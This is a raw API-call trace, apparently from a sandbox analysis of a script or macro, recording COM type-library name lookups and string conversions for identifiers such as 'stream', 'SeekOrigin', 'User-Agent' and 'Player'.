(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.263] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUS") returned 0x10802d [0033.263] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x4, _Src="CUS" | out: _Dst="CUS") returned 0x0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=4, lpWideCharStr=0x2e4230, cchWideChar=4 | out: lpWideCharStr="CUS") returned 4 [0033.263] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.263] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CUS", lHashVal=0x10802d, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.263] IUnknown:Release (This=0x782a220) returned 0x1a [0033.263] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.263] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CUS", lHashVal=0x10802d, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.263] IUnknown:Release (This=0x731da90) returned 0x15 [0033.263] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.263] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CUS", lHashVal=0x10802d, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.263] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.263] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.263] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CUS", lHashVal=0x10802d, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.263] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.264] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb4963f0 [0033.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CUS") returned 0x103d3e [0033.264] strcpy_s (in: _Dst=0x2e4590, _DstSize=0xb, _Src="_B_var_CUS" | out: _Dst="_B_var_CUS") returned 0x0 [0033.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=11, lpWideCharStr=0x2e43e0, cchWideChar=11 | out: lpWideCharStr="_B_var_CUS") returned 11 [0033.264] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.264] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CUS", lHashVal=0x103d3e, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.264] IUnknown:Release (This=0x782a220) returned 0x1a [0033.264] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.264] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CUS", lHashVal=0x103d3e, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.264] IUnknown:Release (This=0x731da90) returned 0x15 [0033.264] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.264] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CUS", lHashVal=0x103d3e, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.264] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.264] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.264] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CUS", lHashVal=0x103d3e, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.264] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.264] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.264] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CUS", lHashVal=0x103d3e, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.264] IUnknown:Release (This=0x782b300) returned 0x6 [0033.264] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.264] IUnknown:Release (This=0x782a220) returned 0x1a [0033.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a9a, cbMultiByte=6, lpWideCharStr=0x2e42a0, cchWideChar=5 | out: lpWideCharStr="hort") returned 0 [0033.264] wcscpy_s (in: _Destination=0xb5c88d8, _SizeInWords=0x5, _Source="hort" | out: _Destination="hort") returned 0x0 [0033.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a9a, cbMultiByte=6, lpWideCharStr=0x2e42a0, cchWideChar=5 | out: lpWideCharStr="hort") returned 0 [0033.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.264] IUnknown:AddRef (This=0xb5a5078) returned 0x9 [0033.264] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e4330 | out: pRefType=0x2e4330*=0xfffffffe) returned 0x0 [0033.264] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e4408 | out: ppTInfo=0x2e4408*=0xb5a5018) returned 0x0 [0033.264] IUnknown:Release (This=0xb5a5078) returned 0x8 [0033.264] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x25, ppTInfo=0x2e3b98 | out: ppTInfo=0x2e3b98*=0xb5b1d88) returned 0x0 [0033.265] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3d68 | out: ppvObject=0x2e3d68*=0x0) returned 0x80004002 [0033.265] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e3be8, pDummy=0x10 | out: ppTypeAttr=0x2e3be8, pDummy=0x10) returned 0x0 [0033.265] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0033.265] IUnknown:Release (This=0xb5b1d88) returned 0x2 [0033.265] IUnknown:AddRef (This=0xb5b1d88) returned 0x3 [0033.265] IUnknown:AddRef (This=0xb5b1d88) returned 0x3 [0033.265] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4808, pDummy=0x0 | out: ppTypeAttr=0x2e4808, pDummy=0x0) returned 0x0 [0033.265] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.265] IUnknown:Release (This=0xb5a5018) returned 0x9 [0033.265] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.265] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.265] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.265] IUnknown:Release (This=0xb5b1d88) returned 0x2 [0033.265] IUnknown:AddRef (This=0xb5b1f98) returned 0x3 [0033.265] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e4808, pDummy=0x9d1378c | out: ppTypeAttr=0x2e4808, pDummy=0x9d1378c*=0x0) returned 0x0 [0033.265] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.265] IUnknown:Release (This=0xb5b1f98) returned 0x2 [0033.265] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.265] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.265] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb62d3d2, cbMultiByte=10, lpWideCharStr=0x9d13ba0, cchWideChar=22 | out: lpWideCharStr="User-Agent") returned 10 [0033.265] IUnknown:AddRef (This=0xb5a5078) returned 0xa [0033.266] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e4330 | out: pRefType=0x2e4330*=0xfffffffe) returned 0x0 [0033.266] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e4408 | out: ppTInfo=0x2e4408*=0xb5a5018) returned 0x0 [0033.266] IUnknown:Release (This=0xb5a5078) returned 0x9 [0033.266] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x55, ppTInfo=0x2e3b98 | out: ppTInfo=0x2e3b98*=0xb5b2468) returned 0x0 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3d68 | out: ppvObject=0x2e3d68*=0x0) returned 0x80004002 [0033.266] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2468, ppTypeAttr=0x2e3be8, pDummy=0x10 | out: ppTypeAttr=0x2e3be8, pDummy=0x10) returned 0x0 [0033.266] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2468) returned 0x0 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38f0 | out: ppvObject=0x2e38f0*=0x0) returned 0x80004002 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38e0 | out: ppvObject=0x2e38e0*=0x0) returned 0x80004002 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38e8 | out: ppvObject=0x2e38e8*=0x0) returned 0x80004002 [0033.266] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2468, ppTypeAttr=0x2e3918, pDummy=0x10 | out: ppTypeAttr=0x2e3918, pDummy=0x10) returned 0x0 [0033.266] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2468) returned 0x0 [0033.266] IUnknown:AddRef (This=0xb5b2468) returned 0x3 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3a90 | out: ppvObject=0x2e3a90*=0x0) returned 0x80004002 [0033.266] IUnknown:QueryInterface (in: This=0xb5b2468, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3a88 | out: ppvObject=0x2e3a88*=0x0) returned 0x80004002 [0033.266] IUnknown:Release (This=0xb5b2468) returned 0x2 [0033.266] IUnknown:AddRef (This=0xb5b2468) returned 0x3 [0033.266] IUnknown:AddRef (This=0xb5b2468) returned 0x3 [0033.266] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4808, pDummy=0x0 | out: ppTypeAttr=0x2e4808, pDummy=0x0) returned 0x0 [0033.266] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.266] IUnknown:Release (This=0xb5a5018) returned 0xa [0033.267] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.267] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.267] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.267] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75dc4f0 [0033.267] IUnknown:Release (This=0xb5b2468) returned 0x2 [0033.267] IUnknown:AddRef (This=0xb5b1f98) returned 0x4 [0033.267] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e4808, pDummy=0x9d13db6 | out: ppTypeAttr=0x2e4808, pDummy=0x9d13db6*=0x4) returned 0x0 [0033.267] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.267] IUnknown:Release (This=0xb5b1f98) returned 0x3 [0033.267] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.267] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.267] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SeekOrigin") returned 0x10e507 [0033.267] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0xb, _Src="SeekOrigin" | out: _Dst="SeekOrigin") returned 0x0 [0033.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=11, lpWideCharStr=0x2e4230, cchWideChar=11 | out: lpWideCharStr="SeekOrigin") returned 11 [0033.268] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.268] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="SeekOrigin", lHashVal=0x10e507, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x782a220) returned 0x1a [0033.268] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.268] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="SeekOrigin", lHashVal=0x10e507, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x731da90) returned 0x15 [0033.268] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.268] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="SeekOrigin", lHashVal=0x10e507, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.268] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.268] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="SeekOrigin", lHashVal=0x10e507, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb4963f0 [0033.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SeekOrigin") returned 0x105332 [0033.268] strcpy_s (in: _Dst=0x2e4590, _DstSize=0x12, _Src="_B_var_SeekOrigin" | out: _Dst="_B_var_SeekOrigin") returned 0x0 [0033.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=18, lpWideCharStr=0x2e43e0, cchWideChar=18 | out: lpWideCharStr="_B_var_SeekOrigin") returned 18 [0033.268] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.268] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_SeekOrigin", lHashVal=0x105332, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.268] IUnknown:Release (This=0x782a220) returned 0x1a [0033.268] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.268] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_SeekOrigin", lHashVal=0x105332, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.268] IUnknown:Release (This=0x731da90) returned 0x15 [0033.268] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.268] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_SeekOrigin", lHashVal=0x105332, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.268] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.268] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.268] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_SeekOrigin", lHashVal=0x105332, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.268] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.268] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.268] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_SeekOrigin", lHashVal=0x105332, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.268] IUnknown:Release (This=0x782b300) returned 0x6 [0033.268] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.268] IUnknown:Release (This=0x782a220) returned 0x1a [0033.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60b72, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="begin") returned 0 [0033.268] wcscpy_s (in: _Destination=0xb5c88f0, _SizeInWords=0x6, _Source="begin" | out: _Destination="begin") returned 0x0 [0033.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stream") returned 0x10f92a [0033.268] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x7, _Src="stream" | out: _Dst="stream") returned 0x0 [0033.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=7, lpWideCharStr=0x2e4230, cchWideChar=7 | out: lpWideCharStr="stream") returned 7 [0033.268] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.268] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="stream", lHashVal=0x10f92a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x782a220) returned 0x1a [0033.268] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.268] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="stream", lHashVal=0x10f92a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.268] IUnknown:Release (This=0x731da90) returned 0x15 [0033.269] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.269] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="stream", lHashVal=0x10f92a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.269] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.269] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="stream", lHashVal=0x10f92a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.269] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb4963f0 [0033.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_stream") returned 0x107394 [0033.269] strcpy_s (in: _Dst=0x2e4590, _DstSize=0xe, _Src="_B_var_stream" | out: _Dst="_B_var_stream") returned 0x0 [0033.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=14, lpWideCharStr=0x2e43e0, cchWideChar=14 | out: lpWideCharStr="_B_var_stream") returned 14 [0033.269] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.269] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_stream", lHashVal=0x107394, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.269] IUnknown:Release (This=0x782a220) returned 0x1a [0033.269] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.269] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_stream", lHashVal=0x107394, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.269] IUnknown:Release (This=0x731da90) returned 0x15 [0033.269] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.269] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_stream", lHashVal=0x107394, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.269] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.269] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.269] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_stream", lHashVal=0x107394, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.269] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.269] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.269] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_stream", lHashVal=0x107394, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.269] IUnknown:Release (This=0x782b300) returned 0x6 [0033.269] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.269] IUnknown:Release (This=0x782a220) returned 0x1a [0033.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682191e, cbMultiByte=6, lpWideCharStr=0x2e42a0, cchWideChar=5 | out: lpWideCharStr="Seek") returned 0 [0033.269] wcscpy_s (in: _Destination=0xb5c8908, _SizeInWords=0x5, _Source="Seek" | out: _Destination="Seek") returned 0x0 [0033.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0033.269] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x7, _Src="Player" | out: _Dst="Player") returned 0x0 [0033.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=7, lpWideCharStr=0x2e4230, cchWideChar=7 | out: lpWideCharStr="Player") returned 7 [0033.269] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.269] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Player", lHashVal=0x105b4b, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x782a220) returned 0x1a [0033.269] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.269] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Player", lHashVal=0x105b4b, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x731da90) returned 0x15 [0033.269] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.269] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Player", lHashVal=0x105b4b, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.269] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.269] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Player", lHashVal=0x105b4b, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.269] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.270] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb4963f0 [0033.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Player") returned 0x10d5f4 [0033.270] strcpy_s (in: _Dst=0x2e4590, _DstSize=0xe, _Src="_B_var_Player" | out: _Dst="_B_var_Player") returned 0x0 [0033.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=14, lpWideCharStr=0x2e43e0, cchWideChar=14 | out: lpWideCharStr="_B_var_Player") returned 14 [0033.270] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.270] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Player", lHashVal=0x10d5f4, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.270] IUnknown:Release (This=0x782a220) returned 0x1a [0033.270] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.270] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Player", lHashVal=0x10d5f4, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.270] IUnknown:Release (This=0x731da90) returned 0x15 [0033.270] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.270] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Player", lHashVal=0x10d5f4, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.270] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.270] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.270] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Player", lHashVal=0x10d5f4, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.270] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.270] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.270] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Player", lHashVal=0x10d5f4, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.270] IUnknown:Release (This=0x782b300) returned 0x6 [0033.270] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.270] IUnknown:Release (This=0x782a220) returned 0x1a [0033.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821226, cbMultiByte=6, lpWideCharStr=0x2e42a0, cchWideChar=5 | out: lpWideCharStr="Load") returned 0 [0033.270] wcscpy_s (in: _Destination=0xb5c8920, _SizeInWords=0x5, _Source="Load" | out: _Destination="Load") returned 0x0 [0033.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60b9a, cbMultiByte=6, lpWideCharStr=0x2e42a0, cchWideChar=5 | out: lpWideCharStr="Play") returned 0 [0033.270] wcscpy_s (in: _Destination=0xb5c8938, _SizeInWords=0x5, _Source="Play" | out: _Destination="Play") returned 0x0 [0033.270] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.270] 